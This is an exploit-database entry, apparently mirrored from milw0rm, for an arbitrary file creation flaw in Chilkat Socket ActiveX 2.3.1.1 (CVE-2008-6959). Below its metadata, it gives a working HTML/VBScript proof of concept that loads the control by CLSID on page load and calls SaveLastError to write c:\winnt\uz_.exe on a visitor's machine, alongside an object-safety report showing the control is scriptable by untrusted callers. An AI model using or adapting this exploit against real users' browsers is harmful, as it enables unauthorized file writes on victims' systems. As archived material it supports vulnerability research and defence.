[] NeoSense
E X P L O I T S
title author type platform port cve id

Chilkat Socket ActiveX 2.3.1.1 - Arbitrary File Creation

Author: Zigma
type: remote
platform: windows
port: 
date_added: 2008-11-16 
date_updated:  
verified: 1 
codes: OSVDB-49902;CVE-2008-6959 
tags: 
aliases:  
screenshot_url:  
application_url: 
<html>
<title>ChilkatSocket.DLL Arbitrary File Creation</title><br><br>
<body>
Company Name         : Chilkat Software, Inc.<br><br>
Vulnerable DLL       : ChilkatSocket.DLL<br><br>
DLL's version        : 2,3,1,1<br><br>
Object Safety Report : <br>
Report for Clsid: {474FCCCD-1B89-4D34-9E09-45807F23289C}<br>
RegKey Safe for Script: Faux<br>
RegKey Safe for Init: Faux<br>
Implements IObjectSafety: Vrai<br>
IDisp Safe:  Safe for untrusted: caller,data<br>
IPersist Safe:  Safe for untrusted: caller,data <br>
IPStorage Safe:  Safe for untrusted: caller,data  <br>

Exploit         : Arbitrary File Creation<br><br>
Author          : Underz0ne Crew<br>
                  Zigma<br>
Homepage        : http://www.underz0ne.org<br><br>

<object classid='clsid:474FCCCD-1B89-4D34-9E09-45807F23289C' id='boom' ></object>
<script language='vbscript'>
arg1="c:\winnt\uz_.exe"
boom.SaveLastError arg1
</script>
</body>
<html>

# milw0rm.com [2008-11-17]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.